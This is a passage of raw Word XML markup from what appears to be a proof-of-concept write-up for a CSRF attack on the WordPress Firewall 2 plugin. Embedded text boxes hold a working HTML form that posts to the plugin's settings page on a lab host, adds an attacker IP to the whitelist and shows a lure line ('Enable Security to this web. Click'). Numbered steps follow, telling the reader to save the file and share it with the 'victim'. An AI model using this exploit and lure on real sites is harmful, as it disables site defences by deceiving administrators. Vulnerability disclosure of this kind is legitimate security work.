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&#10;">
                <v:shape id="AutoShape 19" o:spid="_x0000_s1036" style="position:absolute;width:8724;height:4416;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8724,4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euEwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Bb2pukWVrQaZSkIehH8g+dn82yrzUttYm2//WZB8DjMzG+Y+bIzlWipcaVlBd+jCARx&#10;ZnXJuYLjYTWcgHAeWWNlmRT05GC5+BjMMdH2yTtq9z4XAcIuQQWF93UipcsKMuhGtiYO3sU2Bn2Q&#10;TS51g88AN5WMo2gsDZYcFgqsKS0ou+0fRsE9jc9mc15Pf7bXbdru+hP1uVHq67P7nYHw1Pl3+NVe&#10;awXxGP6/hB8gF38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAq8XrhMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m8724,3864l,3864r,276l,4416r8724,l8724,4140r,-276xm8724,3312l,3312r,276l,3864r8724,l8724,3588r,-276xm8724,2484l,2484r,276l,3036r,276l8724,3312r,-276l8724,2760r,-276xm8724,1932l,1932r,276l,2484r8724,l8724,2208r,-276xm8724,1104l,1104r,276l,1656r,276l8724,1932r,-276l8724,1380r,-276xm8724,552l,552,,828r,276l8724,1104r,-276l8724,552xm8724,l,,,276,,552r8724,l8724,276,8724,xe" fillcolor="#dadada" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8724,3864;0,3864;0,4140;0,4416;8724,4416;8724,4140;8724,3864;8724,3312;0,3312;0,3588;0,3864;8724,3864;8724,3588;8724,3312;8724,2484;0,2484;0,2760;0,3036;0,3312;8724,3312;8724,3036;8724,2760;8724,2484;8724,1932;0,1932;0,2208;0,2484;8724,2484;8724,2208;8724,1932;8724,1104;0,1104;0,1380;0,1656;0,1932;8724,1932;8724,1656;8724,1380;8724,1104;8724,552;0,552;0,828;0,1104;8724,1104;8724,828;8724,552;8724,0;0,0;0,276;0,552;8724,552;8724,276;8724,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 18" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:28;top:5;width:692;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PB+xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvutGDrdFVRFooFMQYDx6f2WeymH0bs1uN/74rFDwOM/MNs1h1thY3ar1xrGA8SkAQ&#10;F04bLhUc8q/hBwgfkDXWjknBgzyslv3eAlPt7pzRbR9KESHsU1RQhdCkUvqiIot+5Bri6J1dazFE&#10;2ZZSt3iPcFvLSZJMpUXDcaHChjYVFZf9r1WwPnL2aa7b0y47ZybPZwn/TC9KvQ269RxEoC68wv/t&#10;b61g8g7PL/EHyOUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFS88H7EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2C4B58F8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:spacing w:line="268" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>&lt;form</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 17" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:1243;top:5;width:1924;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2QMwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CCN5sqgfRrlFkWWFBEGs97HG2GdtgM6lNVuu/NwfB4+N9L9e9bcSNOm8cK5gkKQji0mnD&#10;lYJTsR3PQfiArLFxTAoe5GG9+hgsMdPuzjndjqESMYR9hgrqENpMSl/WZNEnriWO3Nl1FkOEXSV1&#10;h/cYbhs5TdOZtGg4NtTY0ldN5eX4bxVsfjn/Ntf93yE/56YoFinvZhelRsN+8wkiUB/e4pf7RyuY&#10;xrHxS/wBcvUEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAJSNkDMAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="72D7AC14" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:spacing w:line="268" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>method=“POST”</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 16" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:3688;top:5;width:5030;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8GXxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gq91U09SBNdgxQLQkEa48Hja/aZLMm+TbOrif++Wyj0OMzMN8w6n2wnbjR441jByzwB&#10;QVw5bbhWcCrfn19B+ICssXNMCu7kId/MHtaYaTdyQbdjqEWEsM9QQRNCn0npq4Ys+rnriaN3cYPF&#10;EOVQSz3gGOG2k4skWUqLhuNCgz29NVS1x6tVsD1zsTPfh6/P4lKYskwT/li2Sj09TtsViEBT+A//&#10;tfdawSKF3y/xB8jNDwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBKb8GXxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0717F36B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:spacing w:line="268" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>action=“</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0000FF"/>
                            <w:sz w:val="24"/>
                            <w:u w:val="thick" w:color="0000FF"/>
                          </w:rPr>
                          <w:t>http://10.0.2.10:8080/wordpress/wp-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 15" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:28;top:281;width:8071;height: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P7XwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7W1BVkrUYRcUFYEGs9eBybsQ02k9pE7f57cxD2+Hjf82Vna/Gg1hvHCkbDBARx4bTh&#10;UsEx//n8BuEDssbaMSn4Iw/LRe9jjql2T87ocQiliCHsU1RQhdCkUvqiIot+6BriyF1cazFE2JZS&#10;t/iM4baWX0kykRYNx4YKG1pXVFwPd6tgdeJsY2678z67ZCbPpwn/Tq5KDfrdagYiUBf+xW/3VisY&#10;x/XxS/wBcvECAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAXoz+18AAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="46E650A6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:ind w:right="18"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0000FF"/>
                            <w:sz w:val="24"/>
                            <w:u w:val="thick" w:color="0000FF"/>
                          </w:rPr>
                          <w:t>admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0000FF"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0000FF"/>
                            <w:sz w:val="24"/>
                            <w:u w:val="thick" w:color="0000FF"/>
                          </w:rPr>
                          <w:t>firewall-2.php</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>&gt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 14" o:spid="_x0000_s1041" type="#_x0000_t202" style="position:absolute;left:28;top:1109;width:2406;height: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FtMxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW8NRsVpE3diBSFgiCN6aHH1+wzWZJ9G7Nbjf/eLRQ8DjPzDbNcjbYTZxq8caxgmqQg&#10;iCunDdcKvsrt8wsIH5A1do5JwZU8rPLHhyVm2l24oPMh1CJC2GeooAmhz6T0VUMWfeJ64ugd3WAx&#10;RDnUUg94iXDbyVmaLqRFw3GhwZ7eG6raw69VsP7mYmNO+5/P4liYsnxNebdolZo8jes3EIHGcA//&#10;tz+0gvkU/r7EHyDzGwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAxwFtMxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="75A69AD8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:ind w:right="-2"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>&lt;script&gt;alert(“Admin Submit”)&lt;/script&gt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 13" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:2671;top:1109;width:1035;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sU7wwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gredKOC2OgqUhQKQjGmB4/P7DNZzL5Ns1uN/74rCB6HmfmGWaw6W4srtd44VjAaJiCI&#10;C6cNlwp+8u1gBsIHZI21Y1JwJw+r5Vtvgal2N87oegiliBD2KSqoQmhSKX1RkUU/dA1x9M6utRii&#10;bEupW7xFuK3lOEmm0qLhuFBhQ58VFZfDn1WwPnK2Mb/fp312zkyefyS8m16U6r936zmIQF14hZ/t&#10;L61gMobHl/gD5PIfAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAwRLFO8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="78E36D29" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:spacing w:line="268" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Request.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 12" o:spid="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:3938;top:1109;width:4777;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mCgxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTemo0VpEY3IqWFQkEa48HjM/tMlmTfptmtpv/eLRQ8DjPzDbPejLYTFxq8caxglqQg&#10;iCunDdcKDuX70wsIH5A1do5JwS952OSThzVm2l25oMs+1CJC2GeooAmhz6T0VUMWfeJ64uid3WAx&#10;RDnUUg94jXDbyec0XUiLhuNCgz29NlS1+x+rYHvk4s18705fxbkwZblM+XPRKvU4HbcrEIHGcA//&#10;tz+0gvkc/r7EHyDzGwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCuXmCgxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6D5BB91A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:tabs>
                            <w:tab w:val="left" w:pos="1039"/>
                            <w:tab w:val="left" w:pos="2236"/>
                            <w:tab w:val="left" w:pos="2716"/>
                            <w:tab w:val="left" w:pos="3395"/>
                            <w:tab w:val="left" w:pos="4185"/>
                          </w:tabs>
                          <w:spacing w:line="268" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Enable</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:tab/>
                          <w:t>Security</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:tab/>
                          <w:t>to</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:tab/>
                          <w:t>this</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:tab/>
                          <w:t>web.</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:tab/>
                          <w:t>Click</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 11" o:spid="_x0000_s1044" type="#_x0000_t202" style="position:absolute;left:28;top:1937;width:8690;height:22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jUxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6sa2iEZXEVEQCqUxHjw+s89kMfs2za4a/71bKHgcZuYbZrbobC2u1HrjWMFwkIAg&#10;Lpw2XCrY55u3MQgfkDXWjknBnTws5r2XGaba3Tij6y6UIkLYp6igCqFJpfRFRRb9wDXE0Tu51mKI&#10;si2lbvEW4baW70kykhYNx4UKG1pVVJx3F6tgeeBsbX6/jz/ZKTN5Pkn4a3RW6rXfLacgAnXhGf5v&#10;b7WCj0/4+xJ/gJw/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACG3+NTEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0925FA94" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:spacing w:line="268" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>&lt;input type=“hid</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>den” name=“whitelisted_ip[]” value=“10.0.2.10”&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="110AA30F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="601E3F21" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>&lt;input type=“hidden” name=“set_whitelisted_ip” value=“Set Whitelisted IPs” class=“button-secondary”&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0368B62D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="63218003" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>&lt;input type=“submit”&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1738DE9D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="7BC0F99C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>&lt;/form&gt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA16FD0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4B794B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Save the file as Security_Script.html on the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D792077" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Share this file to the user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF568F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="103" w:line="276" w:lineRule="auto"/>
